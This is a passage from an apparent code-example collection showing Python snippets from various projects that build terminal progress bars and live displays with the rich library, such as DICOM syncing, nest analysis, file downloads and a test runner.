        loop = asyncio.get_event_loop()
        catalogues = loop.run_until_complete(
            _get_datacloud_catalogue(id_catalogue, progress_bar, progress,
                                     local))[0]

    return catalogues
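
A hypothetical call, fetching one catalogue for a single identifier with the progress bar enabled (the id and catalogue name are placeholders):

catalogues = get_datacloud_catalogue("Ceres", "diamalbedo", progress=True)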
Example 15
def query(
    params,
    remote,
    query,
    level,
    query_res,
    since,
    before,
    local,
    out_format,
    assume_yes,
    no_progress,
):
    """Perform a query against a network node"""
    if level is not None:
        level = level.upper()
        for q_lvl in QueryLevel:
            if q_lvl.name == level:
                level = q_lvl
                break
        else:
            cli_error("Invalid level: %s" % level)
    if query_res is None and not sys.stdin.isatty():
        log.debug("Reading query_res from stdin")
        query_res = sys.stdin
    if query_res is not None:
        in_str = query_res.read()
        if in_str:
            query_res = json_serializer.loads(in_str)
        else:
            query_res = None

    if sys.stdout.isatty():
        if out_format is None:
            out_format = "tree"
    else:
        no_progress = True
        if out_format is None:
            out_format = "json"
    if out_format not in ("tree", "json"):
        cli_error("Invalid out-format: %s" % out_format)
    local = params["config"].get_local_node(local)
    remote_node = params["config"].get_remote_node(remote)
    net_ent = LocalEntity(local)
    qdat = _build_query(query, since, before)
    if len(qdat) == 0 and query_res is None and not assume_yes:
        if not click.confirm("This query hasn't been limited in any "
                             "way and may generate a huge result, "
                             "continue?"):
            return
    with ExitStack() as estack:
        if not no_progress:
            prog = RichProgressHook(
                estack.enter_context(
                    Progress(console=params["rich_con"], transient=True)))
            report = MultiListReport(description="query", prog_hook=prog)
        else:
            report = MultiListReport(description="query")

        qr = asyncio.run(
            net_ent.query(remote_node, level, qdat, query_res, report=report))
    if out_format == "tree":
        out = qr.to_tree()
    elif out_format == "json":
        out = json_serializer.dumps(qr, indent=4)
    click.echo(out)
    report.log_issues()
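
Hypothetical shell usage of the command above (the node name and flag spellings are assumed from the function signature):

    dcm query srcpacs --level STUDY --since 20230101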
Example 16
COLUMNS = [
    BarColumn(bar_width=None),
    "Completed: ",
    TextColumn("[bold magenta]Completed {task.completed}/{task.total}"),
    "[progress.percentage]{task.percentage:>3.0f}%",
    "•",
    "Speed: ",
    SpeedColumn(),
    "•",
    "Remaining: ",
    TimeRemainingColumn(),
    "Elpsed: ",
    TimeElapsedColumn(),
]

progress = Progress(*COLUMNS, transient=False)

progess_with_description = Progress(
    *([TextColumn("[bold salmon]Task: {task.description}")] + COLUMNS),
    transient=False,
)


def track(iterable, total=None, description="Working...", transient=False):
    """
    Spawns a progress bar to monitor the progress of a for loop over
    an iterable sequence with detailed information.

    Arguments:
        iterable: list or other iterable object
        total: int. Total length of iterable
    """
    # the source is truncated here; a minimal, assumed completion follows
    with progess_with_description as prog:
        task = prog.add_task(description, total=total or len(iterable))
        for item in iterable:
            yield item
            prog.update(task, advance=1)
Example 17
def sync(
    params,
    dests,
    source,
    query,
    query_res,
    since,
    before,
    edit,
    edit_json,
    trust_level,
    force_all,
    method,
    keep_errors,
    dry_run,
    local,
    dir_format,
    recurse,
    in_file_ext,
    out_file_ext,
    no_progress,
    no_report,
):
    """Sync DICOM data from a one or more sources to one or more destinations

    The `dests` can be a local directory, a DICOM network entity (given as
    'hostname:aetitle:port'), or a named remote/route from your config file.

    Generally you will need to use `--source` to specify the data source, unless
    you pass in a query result which contains a source (e.g. when doing
    'dcm query srcpacs ... | dcm sync destpacs'). The `--source` can be given
    in the same way `dests` are specified, except it cannot be a 'route'.
    """
    # Check for incompatible options
    # if validate and dry_run:
    #    cli_error("Can't do validation on a dry run!")

    # Disable progress for non-interactive output or dry runs
    if not sys.stdout.isatty() or dry_run:
        no_progress = True

    # Build query dataset if needed
    if len(query) != 0 or since is not None or before is not None:
        query = _build_query(query, since, before)
    else:
        query = None

    # Handle query-result options
    if query_res is None and not sys.stdin.isatty():
        query_res = sys.stdin
    if query_res is not None:
        in_str = query_res.read()
        if in_str:
            query_res = json_serializer.loads(in_str)
        else:
            query_res = None

    # Determine the local node being used
    try:
        local = params["config"].get_local_node(local)
    except NoLocalNodeError:
        local = None

    # Pass source options that override config through to the config parser
    local_dir_kwargs = {"make_missing": False}
    if recurse is not None:
        local_dir_kwargs["recurse"] = recurse
    if in_file_ext is not None:
        local_dir_kwargs["file_ext"] = in_file_ext
    params["config"].set_local_dir_kwargs(**local_dir_kwargs)
    params["config"].set_net_repo_kwargs(local=local)

    # Figure out source info
    if len(source) == 0:
        if query_res is None or query_res.prov.source is None:
            cli_error("No data source specified")
        if local is None:
            raise NoLocalNodeError("No local DICOM node configured")
        sources = [NetRepo(local, query_res.prov.source)]
    else:
        sources = []
        for s in source:
            try:
                sources.append(params["config"].get_bucket(s))
            except Exception as e:
                cli_error(f"Error processing source '{s}': {e}")

    # Pass dest options that override config through to the config parser
    local_dir_kwargs = {}
    if dir_format is not None:
        local_dir_kwargs["out_fmt"] = dir_format
    if out_file_ext is not None:
        local_dir_kwargs["file_ext"] = out_file_ext
    params["config"].set_local_dir_kwargs(**local_dir_kwargs)

    # Some command line options override route configuration
    static_route_kwargs = {}
    dynamic_route_kwargs = {}

    # Handle edit options
    filt = None
    if edit_json is not None:
        edit_dict = json.load(edit_json)
        edit_json.close()
    else:
        edit_dict = {}
    if edit:
        for edit_str in edit:
            attr, val = edit_str.split("=")
            edit_dict[attr] = val
    if edit_dict:
        filt = make_edit_filter(edit_dict)
        static_route_kwargs["filt"] = filt
        dynamic_route_kwargs["filt"] = filt

    # Convert dests/filters to a StaticRoute
    if method is not None:
        method = TransferMethod[method.upper()]
        static_route_kwargs["methods"] = (method, )
        dynamic_route_kwargs["methods"] = {None: (method, )}

    # Pass route options that override config through to the config parser
    params["config"].set_static_route_kwargs(**static_route_kwargs)
    params["config"].set_dynamic_route_kwargs(**dynamic_route_kwargs)

    # Do a sanity check that no sources are in dests. This is an especially
    # easy mistake to make, as earlier versions took the first positional arg
    # to be the source
    for dest in dests:
        try:
            d_bucket = params["config"].get_bucket(dest)
        except Exception:
            pass
        else:
            if any(s == d_bucket for s in sources):
                cli_error(f"The dest {dest} is also a source!")
            continue
        try:
            static_route = params["config"].get_static_route(dest)
        except Exception:
            pass
        else:
            for d in static_route.dests:
                if any(s == d for s in sources):
                    cli_error(f"The dest {d} is also a source!")
            continue
        try:
            sel_dest_map = params["config"].get_selector_dest_map(dest)
        except Exception:
            pass
        else:
            for _, s_dests in sel_dest_map.routing_map:
                for d in s_dests:
                    if any(s == d for s in sources):
                        cli_error(f"The dest {d} is also a source!")
            continue
        cli_error(f"Unknown dest: {dest}")

    # Convert dests to routes
    dests = params["config"].get_routes(dests)

    # Handle validate option
    # if validate:
    #    validators = [make_basic_validator()]
    # else:
    #    validators = None

    # Handle trust-level option
    trust_level = QueryLevel[trust_level.upper()]

    # Setup reporting/progress hooks and do the transfer
    with ExitStack() as estack:
        if not no_progress:
            prog_hook = RichProgressHook(
                estack.enter_context(
                    Progress(console=params["rich_con"], transient=True)))

        qr_reports = None
        if query is not None or query_res is not None:
            qr_reports = []
            for src in sources:
                if not no_progress:
                    report = MultiListReport(description="init-query",
                                             prog_hook=prog_hook)
                else:
                    report = None
                qr_reports.append(report)

        if query_res is None:
            qrs = None
        else:
            qrs = [deepcopy(query_res) for _ in sources]

        base_kwargs = {
            "trust_level": trust_level,
            "force_all": force_all,
            "keep_errors": keep_errors,
            #'validators': validators,
        }
        sm_kwargs = []
        sync_reports = []
        for src in sources:
            if not no_progress:
                sync_report = SyncReport(prog_hook=prog_hook)
            else:
                sync_report = SyncReport()
            kwargs = deepcopy(base_kwargs)
            kwargs["report"] = sync_report
            sm_kwargs.append(kwargs)
            sync_reports.append(sync_report)

        asyncio.run(
            sync_data(sources, dests, query, qrs, qr_reports, sm_kwargs,
                      dry_run))

    for report in sync_reports:
        report.log_issues()
        if not no_report:
            click.echo(report)
            click.echo("\n")
Example 18
def analyze_nests(config, area, nest_mons, queries, reset_time, nodelete):
    OSM_DATE = osm_date()
    # Getting OSM/overpass data
    
    osm_file_name = f"data/osm_data/{area.name} {OSM_DATE.replace(':', '')}.json"
    try:
        with open(osm_file_name, mode="r", encoding="utf-8") as osm_file:
            nest_json = json.load(osm_file)
    except Exception:
        nest_json = get_osm_data(area.bbox, OSM_DATE, osm_file_name)

    # Getting area data

    area_file_name = f"data/area_data/{area.name}.json"
    area_file_data = {}
    try:
        with open(area_file_name, mode="r", encoding="utf-8") as area_file:
            log.info("Found area data file. Reading and using data from it now")
            area_file_data_raw = json.load(area_file)
        for k, v in area_file_data_raw.items():
            area_file_data[int(k)] = v

    except FileNotFoundError:
        pass

    """db_file_name = f"data/db_data/{area.name}.json"
    try:
        with open(db_file_name, mode="r", encoding="utf-8") as db_file:
            db_data = json.load(db_file)
    except FileNotFoundError:
        db_data = {}"""
    
    if not nodelete:
        queries.nest_delete(area.sql_fence)

    log.info(f"Got all relevant information. Searching for nests in {area.name} now")

    nodes = {}
    ways = []
    relations = []
    for element in nest_json['elements']:
        if not "type" in element:
            continue
        if element["type"] == "node":
            nodes[element["id"]] = {
                "lat": element["lat"],
                "lon": element["lon"]
            }
        elif element["type"] == "way":
            if "nodes" not in element and not element["nodes"]:
                continue
            ways.append(WayPark(element, config))
        elif element["type"] == "relation":
            if "members" not in element and not element["members"]:
                continue
            relations.append(RelPark(element, config))

    parks = ways + relations

    # Check Relations

    failed_nests = defaultdict(int)
    failed_nests["Total Nests found"] = 0
    double_ways = []

    start = timeit.default_timer()

    if config.less_queries:
        log.info("Getting DB data")
        all_spawns = [(str(_id), geometry.Point(lon, lat)) for _id, lat, lon in queries.spawns(area.sql_fence)]
        all_mons = queries.all_mons(str(tuple(nest_mons)), str(reset_time), area.sql_fence)
        all_mons = [(_id, geometry.Point(lon, lat)) for _id, lat, lon in all_mons]
    
    with Progress() as progress:
        #check_rels_task = progress.add_task("Generating Polygons", total=len(parks))
        for park in relations:
            double_ways = park.get_polygon(nodes, ways, double_ways)
            #progress.update(check_rels_task, advance=1)
        for park in ways:
            park.get_polygon(nodes)
            #progress.update(check_rels_task, advance=1)

        for osm_id, data in area_file_data.items():
            for connect_id in data["connect"]:
                for i, park in enumerate(parks):
                    if park.id == osm_id:
                        big_park = park
                        big_park_i = i
                    if park.id == connect_id:
                        small_park = park
                        small_park_i = i

                parks[big_park_i].connect.append(connect_id)
                parks[big_park_i].polygon = cascaded_union([big_park.polygon, small_park.polygon])
                parks.pop(small_park_i)

        # NOW CHECK ALL AREAS ONE AFTER ANOTHER
        check_nest_task = progress.add_task("Nests found: 0", total=len(parks))
        nests = []

        for park in parks:
            progress.update(check_nest_task, advance=1, description=f"Nests found: {failed_nests['Total Nests found']}")

            if not park.is_valid:
                failed_nests["Geometry is not valid"] += 1
                continue

            if not area.polygon.contains(park.polygon):
                failed_nests["Not in Geofence"] += 1
                continue

            if park.id in double_ways:
                failed_nests["Avoiding double nests"] += 1
                continue

            pokestop_in = None
            stops = []
            if config.scanner == "rdm" and config.pokestop_pokemon:
                # Get all Pokestops with id, lat and lon
                for pkstp in queries.stops(park.sql_fence):
                    stops.append(str(pkstp[0]))
                pokestop_in = "'{}'".format("','".join(stops))

            if config.less_queries:
                spawns = [s[0] for s in all_spawns if park.polygon.contains(s[1])]
            else:
                spawns = [str(s[0]) for s in queries.spawns(park.sql_fence)]

            if not stops and not spawns:
                failed_nests["No Stops or Spawnpoints"] += 1
                continue
            if (len(stops) < 1) and (len(spawns) < area.settings['min_spawnpoints']):
                failed_nests["Not enough Spawnpoints"] += 1
                continue
            spawnpoint_in = "'{}'".format("','".join(spawns))
            if spawnpoint_in == "''": spawnpoint_in = "NULL" # This will handle the SQL warning since a blank string shouldn't be used for a number

            if config.less_queries:
                mons = [s[0] for s in all_mons if park.polygon.contains(s[1])]
                if len(mons) == 0:
                    failed_nests["No Pokemon"] += 1
                    continue
                most_id = max(set(mons), key=mons.count)
                poke_data = [most_id, mons.count(most_id)]

            else:
                poke_data = queries.mons(spawnpoint_in, str(tuple(nest_mons)), str(reset_time), pokestop_in)

                if poke_data is None:
                    failed_nests["No Pokemon"] += 1
                    continue
            park.mon_data(poke_data[0], poke_data[1], area.settings['scan_hours_per_day'], len(spawns) + len(stops))

            if park.mon_count < area.settings['min_pokemon']:
                failed_nests["Not enough Pokemon"] += 1
                continue
            if park.mon_avg < area.settings['min_average']:
                failed_nests["Average spawnrate too low"] += 1
                continue
            if park.mon_ratio < area.settings['min_ratio']:
                failed_nests["Average spawn ratio too low"] += 1
                continue

            try:
                park.generate_details(area_file_data, failed_nests["Total Nests found"])
            except TopologicalError:
                failed_nests["Geometry is not valid"] += 1
                continue

            # Insert Nest data to db
            insert_args = {
                "nest_id": park.id,
                "name": park.name,
                "form": park.mon_form,
                "lat": park.lat,
                "lon": park.lon,
                "pokemon_id": park.mon_id,
                "type": 0,
                "pokemon_count": park.mon_count,
                "pokemon_avg": park.mon_avg,
                "pokemon_ratio": park.mon_ratio,
                "poly_path": json.dumps(park.path),
                "poly_type": 1 if isinstance(park, RelPark) else 0,
                "current_time": int(time.time())
            }

            failed_nests["Total Nests found"] += 1
            nests.append(park)

            queries.nest_insert(insert_args)
    stop = timeit.default_timer()
    log.success(f"Done finding nests in {area.name} ({round(stop - start, 1)} seconds)")
    for k, v in failed_nests.items():
        log.info(f" - {k}: {v}")

    def sort_avg(nest):
        return nest.mon_avg

    new_area_data = {}
    for nest in sorted(nests, key=sort_avg, reverse=True):
        new_area_data[nest.id] = {
            "name": nest.name,
            "center": [nest.lat, nest.lon],
            "connect": nest.connect
        }
    for oid, data in area_file_data.items():
        if oid not in [n.id for n in nests]:
            new_area_data[oid] = {
                "name": data["name"],
                "center": data["center"],
                "connect": data["connect"]
            }
    with open(area_file_name, mode="w+") as area_file:
        area_file.write(json.dumps(new_area_data, indent=4))
    log.info("Saved area data")
    log.success(f"All done with {area.name}\n")

    return nests
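
The "Nests found: 0" task above shows the pattern of refreshing a task's description on every tick. A minimal, self-contained sketch of that pattern (the filter condition is a stand-in for the real nest checks):

from rich.progress import Progress

with Progress() as progress:
    found = 0
    task = progress.add_task("Nests found: 0", total=100)
    for i in range(100):
        if i % 7 == 0:  # stand-in for "this park passed every filter"
            found += 1
        # advance the bar and refresh the description in a single update
        progress.update(task, advance=1, description=f"Nests found: {found}")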
Example no. 19
from functools import partial
from urllib.request import urlopen

from rich.progress import (
    BarColumn,
    DownloadColumn,
    TextColumn,
    TransferSpeedColumn,
    TimeRemainingColumn,
    Progress,
    TaskID,
)

progress = Progress(
    TextColumn("[bold blue]{task.fields[filename]}", justify="right"),
    BarColumn(bar_width=None),
    "[progress.percentage]{task.percentage:>3.1f}%",
    "•",
    DownloadColumn(),
    "•",
    TransferSpeedColumn(),
    "•",
    TimeRemainingColumn(),
)


def copy_url(task_id: TaskID, url: str, path: str) -> None:
    """Copy data from a url to a local file."""
    response = urlopen(url)
    # This will break if the response doesn't contain content length
    progress.update(task_id, total=int(response.info()["Content-length"]))
    with open(path, "wb") as dest_file:
        progress.start_task(task_id)
        for data in iter(partial(response.read, 32768), b""):
            dest_file.write(data)
            progress.update(task_id, advance=len(data))
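
A hedged sketch of how copy_url might be driven; the worker count, dest_dir, and the download() helper are assumptions, not part of the original:

import os.path
from concurrent.futures import ThreadPoolExecutor

def download(urls, dest_dir="."):
    """Download several URLs concurrently, one progress task per file."""
    with progress:
        with ThreadPoolExecutor(max_workers=4) as pool:
            for url in urls:
                filename = url.split("/")[-1]
                # start=False defers the task until copy_url learns the size
                task_id = progress.add_task("download", filename=filename, start=False)
                pool.submit(copy_url, task_id, url, os.path.join(dest_dir, filename))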
Example no. 20
    """Make a new table."""
    table = Table()
    table.add_column("ID")
    table.add_column("Value")
    table.add_column("Status")

    for row in range(random.randint(2, 6)):
        value = random.random() * 100
        table.add_row(f"{row}", f"{value:3.2f}",
                      "[red]ERROR" if value < 50 else "[green]SUCCESS")
    return table


print('before')

with Progress(transient=True) as progress:

    task1 = progress.add_task("[red]Downloading...", total=1000)
    task2 = progress.add_task("[green]Processing...", total=1000)
    task3 = progress.add_task("[cyan]Cooking...", total=1000)

    while not progress.finished:
        progress.update(task1, advance=5)
        progress.update(task2, advance=3)
        progress.update(task3, advance=9)
        time.sleep(0.02)
# Only one Live display may be active per console at a time; nesting a second
# Live raises LiveError.
with Live(generate_table(), refresh_per_second=4, transient=True) as live:
    for _ in range(10):
        time.sleep(0.4)
        live.update(generate_table())
Example no. 21
from rich.progress import Progress


def test_progress_create() -> None:
    progress = Progress()
    assert progress.finished
    assert progress.tasks == []
    assert progress.task_ids == []
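
A complementary check, sketched here as an assumption about the same API: an unfinished task should flip finished to False until it completes.

def test_progress_task_completion() -> None:
    progress = Progress()
    task_id = progress.add_task("work", total=10)
    assert not progress.finished
    progress.update(task_id, completed=10)
    assert progress.finished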
Example no. 22
 def c_update(self, args, addline=False, update=True, force=False):
     if len(self.core.cfCache) > 0 or len(self.core.wowiCache) > 0:
         self.core.cfCache = {}
         self.core.wowiCache = {}
         self.core.checksumCache = {}
     if args:
         addons = [
             addon.strip()
             for addon in list(reader([args], skipinitialspace=True))[0]
         ]
     else:
         addons = sorted(self.core.config['Addons'],
                         key=lambda k: k['Name'].lower())
     exceptions = []
     with Progress(
             '{task.completed:.0f}/{task.total}',
             '|',
             BarColumn(bar_width=self.console.width + 1),
             '|',
             auto_refresh=False,
             console=None if self.headless else self.console) as progress:
         task = progress.add_task('', total=len(addons))
         if not args:
             self.core.bulk_check(addons)
             self.core.bulk_check_checksum(addons, progress)
         while not progress.finished:
             for addon in addons:
                 try:
                     name, versionnew, versionold, modified = self.core.\
                         update_addon(addon if isinstance(addon, str) else addon['URL'], update, force)
                     if versionold:
                         if versionold == versionnew:
                             if modified:
                                 self.table.add_row(
                                     '[bold red]Modified[/bold red]', name,
                                     versionold)
                             else:
                                 self.table.add_row(
                                     '[green]Up-to-date[/green]', name,
                                     versionold)
                         else:
                             if modified:
                                 self.table.add_row(
                                     '[bold red]Update suppressed[/bold red]',
                                     name, versionold)
                             else:
                                 self.table.add_row(
                                     f'[yellow]{"Updated " if update else "Update available"}'
                                     f'[/yellow]', name,
                                     f'[yellow]{versionnew}[/yellow]')
                     else:
                         self.table.add_row(
                             f'[bold black]Not installed[/bold black]',
                             addon, '')
                 except Exception as e:
                     exceptions.append(e)
                 progress.update(task,
                                 advance=1 if args else 0.5,
                                 refresh=True)
     if addline:
         self.console.print('\n')
     self.console.print(self.table)
     if len(addons) == 0:
         self.console.print(
             'Apparently there are no addons installed by CurseBreaker.\n'
             'Command [green]import[/green] might be used to detect already installed addons.'
         )
     if len(exceptions) > 0:
         self.handle_exception(exceptions, False)
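
The auto_refresh=False argument above means the bar only redraws when an update passes refresh=True. A minimal, self-contained sketch of that pattern (the column strings are illustrative):

from rich.progress import BarColumn, Progress

with Progress('{task.completed:.0f}/{task.total}', '|', BarColumn(), '|',
              auto_refresh=False) as progress:
    task = progress.add_task('', total=10)
    for _ in range(10):
        # nothing is redrawn unless refresh=True is passed
        progress.update(task, advance=1, refresh=True)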
Example no. 23
def run_tests(
    tests: List[str],
    sequential: bool = typer.Option(
        False,
        '--sequential',
        '-s',
        help='Run all tests of each group in order'),
    workers: int = typer.Option(1,
                                '--workers',
                                '-p',
                                help='Number of parallel tasks'),
    iterations: int = typer.Option(10,
                                   '--iter',
                                   '-n',
                                   help='Number of iterations to run'),
    output: Optional[Path] = typer.Option(None,
                                          '--output',
                                          '-o',
                                          help='Output path to use'),
    verbose: bool = typer.Option(False,
                                 '--verbose',
                                 '-v',
                                 help='Verbosity level'),
    archive: bool = typer.Option(
        False,
        '--archive',
        '-a',
        help='Save all logs instead of only failed ones'),
    race: bool = typer.Option(False,
                              '--race/--no-race',
                              '-r/-R',
                              help='Run with race checker'),
    loop: bool = typer.Option(False, '--loop', '-l', help='Run continuously'),
    growth: int = typer.Option(
        10,
        '--growth',
        '-g',
        help='Growth ratio of iterations when using --loop'),
    timing: bool = typer.Option(False,
                                '--timing',
                                '-t',
                                help='Report timing, only works on macOS'),
):
    print(tests)
    if output is None:
        timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
        output = Path(timestamp)

    if race:
        print("[yellow]Running with the race detector\n[/yellow]")

    if verbose:
        print(f"[yellow]Verbosity level set to 1 [/yellow]")
        os.environ['DEBUG'] = '1'

    while True:

        total = iterations * len(tests)
        completed = 0

        results = {test: defaultdict(StatsMeter) for test in tests}

        if sequential:
            test_instances = itertools.chain.from_iterable(
                itertools.repeat(test, iterations) for test in tests)
        else:
            test_instances = itertools.chain.from_iterable(
                itertools.repeat(tests, iterations))
        test_instances = iter(test_instances)

        total_progress = Progress(
            "[progress.description]{task.description}",
            BarColumn(),
            TimeRemainingColumn(),
            "[progress.percentage]{task.percentage:>3.0f}%",
            TimeElapsedColumn(),
        )
        total_task = total_progress.add_task("[yellow]Tests[/yellow]",
                                             total=total)

        task_progress = Progress(
            "[progress.description]{task.description}",
            SpinnerColumn(),
            BarColumn(),
            "{task.completed}/{task.total}",
        )
        tasks = {
            test: task_progress.add_task(test, total=iterations)
            for test in tests
        }

        progress_table = Table.grid()
        progress_table.add_row(total_progress)
        progress_table.add_row(Panel.fit(task_progress))

        with Live(progress_table, transient=True) as live:

            def handler(_, frame):
                live.stop()
                print('\n')
                print_results(results)
                sys.exit(1)

            signal.signal(signal.SIGINT, handler)

            with ThreadPoolExecutor(max_workers=workers) as executor:

                futures = []
                while completed < total:
                    n = len(futures)
                    if n < workers:
                        for test in itertools.islice(test_instances,
                                                     workers - n):
                            futures.append(
                                executor.submit(run_test, test, race, timing))

                    done, not_done = wait(futures, return_when=FIRST_COMPLETED)

                    for future in done:
                        test, path, rc, runtime = future.result()

                        results[test]['completed'].add(1)
                        results[test]['time'].add(runtime)
                        task_progress.update(tasks[test], advance=1)
                        dest = (output / f"{test}_{completed}.log").as_posix()
                        if rc != 0:
                            print(f"Failed test {test} - {dest}")
                            task_progress.update(
                                tasks[test], description=f"[red]{test}[/red]")
                            results[test]['failed'].add(1)
                        else:
                            if results[test][
                                    'completed'].n == iterations and results[
                                        test]['failed'].n == 0:
                                task_progress.update(
                                    tasks[test],
                                    description=f"[green]{test}[/green]")

                        if rc != 0 or archive:
                            output.mkdir(exist_ok=True, parents=True)
                            shutil.copy(path, dest)

                        if timing:
                            line = last_line(path)
                            real, _, user, _, system, _ = line.replace(
                                ' ' * 8, '').split(' ')
                            results[test]['real_time'].add(float(real))
                            results[test]['user_time'].add(float(user))
                            results[test]['system_time'].add(float(system))

                        os.remove(path)

                        completed += 1
                        total_progress.update(total_task, advance=1)

                    futures = list(not_done)

        print_results(results, timing)

        if loop:
            iterations *= growth
            print(f"[yellow]Increasing iterations to {iterations}[/yellow]")
        else:
            break
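
The layout above, two Progress renderables stacked in a Table.grid and driven inside a single Live, reduces to this minimal sketch (task names and totals are made up):

import time
from rich.live import Live
from rich.panel import Panel
from rich.table import Table
from rich.progress import BarColumn, Progress

overall = Progress("{task.description}", BarColumn())
per_test = Progress("{task.description}", BarColumn())

grid = Table.grid()
grid.add_row(overall)
grid.add_row(Panel.fit(per_test))

with Live(grid, transient=True):
    total = overall.add_task("total", total=4)
    one = per_test.add_task("test-a", total=4)
    for _ in range(4):
        time.sleep(0.1)
        overall.advance(total)
        per_test.advance(one)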
Example no. 24
from rich.align import Align
from rich.panel import Panel
from rich.progress import BarColumn, Progress, SpinnerColumn, TextColumn
from rich.table import Table
from rich.text import Text


class TrafficProgress:
    def __init__(
        self,
        numRepos: int,
        follower: int = 0,
        following: int = 0,
        numStat: int = 5,
    ) -> None:

        self.numStat = numStat
        self.numRepos = numRepos
        self._profileText = Text(
            f"{follower:03d} Follower\n{following:03d} Following\n{numRepos:03d} Public Repositories"
        )

        self.progressTable = Table.grid(expand=True)
        self.progressTotal = Progress(
            "{task.description}",
            SpinnerColumn(),
            BarColumn(),
            TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
        )

        self.progressTable.add_row(
            Panel(
                Align.center(Text(
                    """Placeholder""",
                    justify="center",
                )),
                title="[b]Info",
                border_style="red",
                padding=(1, 1),
            ),
            Panel(
                Align.center(self._profileText),
                title="[b]Profile Info",
                border_style="yellow",
                padding=(1, 1),
            ),
            Panel(
                self.progressTotal,  # type:ignore
                title="[b]Total Progress",
                border_style="green",
                padding=(1, 2),
            ),
        )

        self.taskTotal = self.progressTotal.add_task(description="Progress",
                                                     total=numStat * numRepos)
        self.taskRepo = self.progressTotal.add_task(
            description="Repository [bold yellow]#", total=numRepos)
        self.taskStat = self.progressTotal.add_task(
            description="Stat [bold violet]#", total=numStat)

    def UpdateRepoDescription(self, repo: str):
        self.progressTotal.update(
            self.taskRepo, description=f"Repository [bold yellow]#{repo}")

    def UpdateStatDescription(self, stat: str):
        self.progressTotal.update(self.taskStat,
                                  description=f"Stat [bold violet]#{stat}")

    def StepTotal(self):
        self.progressTotal.advance(self.taskTotal)

    def StepRepo(self):
        self.progressTotal.advance(self.taskRepo)

    def StepStat(self):
        self.progressTotal.advance(self.taskStat)

    def ResetStatProgress(self):
        self.progressTotal.reset(self.taskStat)

    def CompleteStat(self):
        self.progressTotal.reset(
            self.taskStat,
            description="Stat [bold violet]#Completed",
            completed=self.numStat,
        )
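
A hypothetical driver for TrafficProgress, assuming it is rendered with rich.live.Live; the repository and stat names below are placeholders:

from rich.live import Live

tp = TrafficProgress(numRepos=2, follower=10, following=5)
with Live(tp.progressTable, refresh_per_second=10):
    for repo in ("repo-a", "repo-b"):
        tp.UpdateRepoDescription(repo)
        tp.ResetStatProgress()
        for stat in ("views", "clones", "stars", "forks", "paths"):
            tp.UpdateStatDescription(stat)
            tp.StepStat()
            tp.StepTotal()
        tp.CompleteStat()
        tp.StepRepo()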
Example no. 25
class DisplayManager:
    def __init__(self):

        # ! Change color system if "legacy" windows terminal to prevent wrong colors displaying
        self.is_legacy = detect_legacy_windows()

        # ! dumb_terminals automatically handled by rich. Color system is too but it is incorrect
        # ! for legacy windows ... so no color for y'all.
        self.console = Console(
            theme=custom_theme,
            color_system="truecolor" if not self.is_legacy else None)

        self._rich_progress_bar = Progress(
            SizedTextColumn(
                "[white]{task.description}",
                overflow="ellipsis",
                width=int(self.console.width / 3),
            ),
            SizedTextColumn("{task.fields[message]}",
                            width=18,
                            style="nonimportant"),
            BarColumn(bar_width=None, finished_style="green"),
            "[progress.percentage]{task.percentage:>3.0f}%",
            TimeRemainingColumn(),
            console=self.console,
            # ! Normally when you exit the progress context manager (or call stop())
            # ! the last refreshed display remains in the terminal with the cursor on
            # ! the following line. You can also make the progress display disappear on
            # ! exit by setting transient=True on the Progress constructor
            transient=self.is_legacy,
        )

        self.song_count = 0
        self.overall_task_id = None
        self.overall_progress = 0
        self.overall_total = 100
        self.overall_completed_tasks = 0
        self.quiet = False

        # ! Basically a wrapper for rich's: with ... as ...
        self._rich_progress_bar.__enter__()

    def print(self, *text, color="green"):
        """
        `text` : `any`  Text to be printed to screen
        Use this self.print to replace default print().
        """

        if self.quiet:
            return

        line = " ".join(str(item) for item in text)
        if color:
            self._rich_progress_bar.console.print(f"[{color}]{line}")
        else:
            self._rich_progress_bar.console.print(line)

    def set_song_count_to(self, song_count: int) -> None:
        """
        `int` `song_count` : number of songs being downloaded
        RETURNS `~`
        sets the size of the progressbar based on the number of songs in the current
        download set
        """

        # ! all calculations are based of the arbitrary choice that 1 song consists of
        # ! 100 steps/points/iterations
        self.song_count = song_count

        self.overall_total = 100 * song_count

        if self.song_count > 4:
            self.overall_task_id = self._rich_progress_bar.add_task(
                description="Total",
                process_id="0",
                message=
                f"{self.overall_completed_tasks}/{int(self.overall_total / 100)} complete",
                total=self.overall_total,
                visible=(not self.quiet),
            )

    def update_overall(self):
        """
        Updates the overall progress bar.
        """

        # If the overall progress bar exists
        if self.overall_task_id is not None:
            self._rich_progress_bar.update(
                self.overall_task_id,
                message=
                f"{self.overall_completed_tasks}/{int(self.overall_total / 100)} complete",
                completed=self.overall_progress,
            )

    def new_progress_tracker(self, songObj):
        """
        returns new instance of `_ProgressTracker` that follows the `songObj` download subprocess
        """
        return _ProgressTracker(self, songObj)

    def close(self) -> None:
        """
        clean up rich
        """

        self._rich_progress_bar.stop()
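
A hedged usage sketch for DisplayManager; the 100-points-per-song convention comes from its own comments, and the update sequence is an assumption:

display = DisplayManager()
display.set_song_count_to(5)  # the overall bar only appears for more than 4 songs
for done in range(1, 6):
    display.overall_progress = done * 100
    display.overall_completed_tasks = done
    display.update_overall()
display.print("All downloads complete")
display.close()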
Example no. 26
def run(check_target, output, out_format, query, version):
    """Run checks against CHECK_TARGET.

    \b
    CHECK_TARGET can be:
      rpm file
      directory containing rpm files
      "system" to check locally installed kernel modules
      a config file listing remote systems to check (Please
      ensure your remote systems are scp command accessable)

      default is local system
    """

    if version:
        print(__VERSION__)
        exit()

    FORMAT = "%(asctime)-15s %(message)s"
    logging.basicConfig(format=FORMAT, handlers=[RichHandler()])
    logger = logging.getLogger("rich")
    logger.setLevel(logging.INFO)

    target = Check_Target(check_target)

    query = query.lower()

    dst = Path(output)
    if dst.is_dir() or output.endswith("/"):
        dst = dst / "check_result"

    if not dst_is_ok(dst, out_format):
        logger.error("Can't write to output")
        exit(1)

    # try to guess format from file extension
    if out_format is None:
        ext_to_format = {v: k for k, v in FORMAT_TYPES.items()}
        out_format = ext_to_format.get(dst.suffix, None)

    if target.rpm:
        progress = Progress(
            "{task.description}",
            SpinnerColumn(),
            BarColumn(),
            TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
        )
        with progress:
            rpmCheck = data_reader.RPMReader(progress)
            check_result = rpmCheck.get_rpm_info(target.rpm)

    elif target.dir:
        progress = Progress(
            "{task.description}",
            SpinnerColumn(),
            BarColumn(),
            TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
        )
        with progress:
